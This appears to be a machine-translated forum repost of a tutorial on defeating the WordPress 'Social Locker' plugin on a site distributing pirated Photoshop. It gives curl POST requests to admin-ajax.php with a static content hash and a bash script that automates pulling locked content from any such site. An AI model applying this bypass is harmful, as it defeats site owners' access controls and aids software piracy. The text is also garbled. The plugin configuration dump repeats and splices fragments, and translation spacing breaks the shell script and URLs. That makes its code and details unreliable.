The article "Attacks on JavaScript" shows examples of bypassing restrictions imposed by JavaScript. It is clear that there is a tutorial example, so it is rather pointless. Let's take a more realistic situation. In the article "Bypass HTML source blocking, bypass social blockers and other countermeasures to collect information about the site" I showed how easy it is to bypass social blockers, since hidden links and text are loaded on the page, but styles are used to make this block invisible ... I even made a small service that will show you everything that social blockers hide. It's so easy you don't even have to fight JavaScript.
But they sent me an example site (_https: //www.yasir252.com/software/download-adobe-photoshop-cc-2020-full-version-windows/) that uses a more cunning social blocker.
Looking ahead, this is a paid plugin called "Social Locker for WordPress" and costs $ 27:
Moreover, this is not an abandoned plugin, at the time of writing, the last update was made on May 8, 2020.
Let's start by parsing HTML and JavaScript code.
As you can see, in the source code the name is BizPanda Lockers, the path to this file is / sociallocker-next-premium / bizpanda, I googled and found the page of this very Social Locker for WordPress.
Analysis of the source code of the page showed that the content of the hidden block is missing in it, although there is some interesting data:
Code:
if (! window.bizpanda) window.bizpanda = {};
if (! window.bizpanda.lockerOptions) window.bizpanda.lockerOptions = {};
window.bizpanda.lockerOptions ['onpLock951887'] = {"lockerId": "3169", "tracking": "0", "postId": 17162, "ajaxUrl": "https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / wp-admin \ /admin-ajax.php "," options ": {" demo ": 1," actualUrls ": 0," text ": {" header ":" Link Download Tanpa Iklan "," message " : "Klik salah satu tombol dibawah ini untuk download tanpa iklan. <\ / P> "}," theme ":" great-attractor "," lang ":" en_US "," agreement ": {" note ": 0," termsUrl ": false ," privacyPolicyUrl ": false, "showInPopup": {"width": 570, "height": 400}}, "overlap": {"mode": "full", "position": "middle", "altMode": "full"}, "highlight": 0, "googleAnalytics": 0, "locker": {"counter": 1, "loadingTimeout": "20000", "tumbler": 0, "naMode": "show-error", "inAppBrowsers" : "visible_with_warning", "inAppBrowsersWarning": "You are viewing this page in the {browser}. The locker may work incorrectly in this browser. Please open this page in a standard browser.", "close": 0, "mobile" : 1, "expires": 0}, "proxy": "https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / wp-admin \ /admin-ajax.php? Action = opanda_connect", "groups": ["social-buttons "]," socialButtons ": {" counters ": 1," order ": [" facebook-share "," twitter-tweet "]," behaviorOnError ":" show_error "," behaviorError ":" Matikan Adblock Untuk Download Tanpa Iklan "," facebook ": {" appId ":" 331196770812733 "," lang ":" en_US "," version ":" v6.0 "," like ": {" url ":" https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / yasir252 "," title ":" Like "," theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":facebook-share "," twitter-tweet "]," behaviorOnError ":" show_error "," behaviorError ":" Matikan Adblock Untuk Download Tanpa Iklan "," facebook ": {" appId ":" 331196770812733 "," lang ": "en_US", "version": "v6.0", "like": {"url": "https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / yasir252", "title": "Like", "theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / ", "title": "Share", "shareDialog":facebook-share "," twitter-tweet "]," behaviorOnError ":" show_error "," behaviorError ":" Matikan Adblock Untuk Download Tanpa Iklan "," facebook ": {" appId ":" 331196770812733 "," lang ": "en_US", "version": "v6.0", "like": {"url": "https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / yasir252", "title": "Like", "theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / ", "title": "Share", "shareDialog":facebook ": {" appId ":" 331196770812733 "," lang ":" en_US "," version ":" v6.0 "," like ": {" url ":" https: \ / \ /
You do not have permission to view link
Log in or register now.
. com \ / yasir252 "," title ":" Like "," theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / software \ / download-adobe -photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":facebook ": {" appId ":" 331196770812733 "," lang ":" en_US "," version ":" v6.0 "," like ": {" url ":" https: \ / \ /
You do not have permission to view link
Log in or register now.
. com \ / yasir252 "," title ":" Like "," theConfirmIssue ": 0}," share ": {" url ":" https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / software \ / download-adobe -photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":com \ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" Share "," shareDialog ":true }}, "twitter": {"lang": "en", "tweet": {"url": "https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / software \ / download-adobe-photoshop-cc -2020-full-version-windows \ / "," doubleCheck ": 1," title ":" Tweet "}," follow ": {" url ":" https: \ / \ / twitter.com \ / yasir252com " , "title": "Follow us", "doubleCheck": 1, "hideScreenName": 1}}, "google": {"lang": "en", "plus": {"url": "https: \ /\/www.yasir252.com\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/","title":"+1 us "}," share ": {" url ":" https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":"Share "}}," youtube ": {" subscribe ": {" channelId ":" UCvPfXFZzw3x4I1FBYVlXbsg "," title ":" Youtube "}}," linkedin ": {" share ": {" url ":" https: \ / \ /
You do not have permission to view link
Log in or register now.
\ / software \ / download-adobe-photoshop-cc-2020-full-version-windows \ / "," title ":" share "}}}," lazy ": true}, "_ theme": "great-attractor", "_ style": null , "ajax": true , "contentHash": "e408051e78dd01cade57a25100ad70c7", "stats": false };Analysis of the JavaScript script file (_https: //www.yasir252.com/wp-content/plugins/sociallocker-next-premium/bizpanda/assets/js/lockers.020405.min.js) gave this interesting snippet:
// loading the locked content via ajax
if (data.ajax) {
options.content = {
url: data.ajaxUrl,
type: 'POST',
data: {
lockerId: data.lockerId,
action: 'opanda_loader',
hash: data.contentHash
}
};
}
Pay attention to the comment - "loading blocked content via ajax".
The ajaxUrl, lockerId and contentHash values can be found in the previous code snippet.
In fact, I found the second snippet after figuring out how to bypass this social blocker. You could skip the analysis of the source code altogether and immediately start by analyzing the POST request (see "How to Analyze POST Requests in a Web Browser").
I "liked" the article to view the hidden text:
As you can see, a POST request is sent to the page
You do not have permission to view link
Log in or register now.
containing the string "lockerId = 3169 & action = opanda_loader & hash = e408051e78dd01cade57a25100ad70c7":
And in response comes a code hidden by a social blocker:
Rendering the received data:
Trying to get hidden text bypassing sharing on social networks:
Code:
curl
You do not have permission to view link
Log in or register now.
-d 'lockerId = 3169 & action = opanda_loader & hash = e408051e78dd01cade57a25100ad70c7'Everything worked!
If you do not understand the HTML text, then save it to a file and open it in a web browser:
Code:
curl
You do not have permission to view link
Log in or register now.
-d 'lockerId = 3169 & action = opanda_loader & hash = e408051e78dd01cade57a25100ad70c7'> locker.htm && firefox locker.htm
Further analysis showed that the hash is static and is always contained in the source code. The lockerId value does not change and any number can be substituted there (perhaps this is the result of a "crack").
In order not to crawl into the source code every time, we will create a script for automation. To the sociallocker-next-premium.sh file:
Code:
gedit sociallocker-next-premium.sh
Copy the following:
Code:
#! / bin / bash
if [[-z $ 1]]; then
echo 'No link provided to bypass social blocker!';
exit 1;
fi
t0 = `curl -s -A 'Mozilla / 5.0 (X11; Linux x86_64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 72.0.3626.119 Safari / 537.36'" $ 1 "`
hash = "` echo "$ t0" | grep -E 'window.bizpanda.lockerOptions' | grep -E -o' "contentHash": "[A-Za-z0-9] {8,}" '| sed' s / "contentHash": "// '| sed 's / "//'` ";
t5 = $ hash
url = "` echo $ 1 | grep -E -o 'http (| s): // [^ /] +' `/ wp-admin / admin-ajax.php"
if [["$ t5"]]; then
curl $ url -d 'lockerId = 3169 & action = opanda_loader & hash =' $ hash
fi
Run like this:
Code:
bash sociallocker-next-premium.sh 'URL'
For example:
Code:
bash sociallocker-next-premium.sh '
You do not have permission to view link
Log in or register now.
'To immediately see the content after rendering the HTML code, use the construction:
Code:
bash sociallocker-next-premium.sh 'URL'> locker.htm && firefox locker.htm
For example:
Code:
bash sociallocker-next-premium.sh '
You do not have permission to view link
Log in or register now.
'> locker.htm && firefox locker.htm
I added support for this plugin to my service for bypassing social blockers:
You do not have permission to view link
Log in or register now.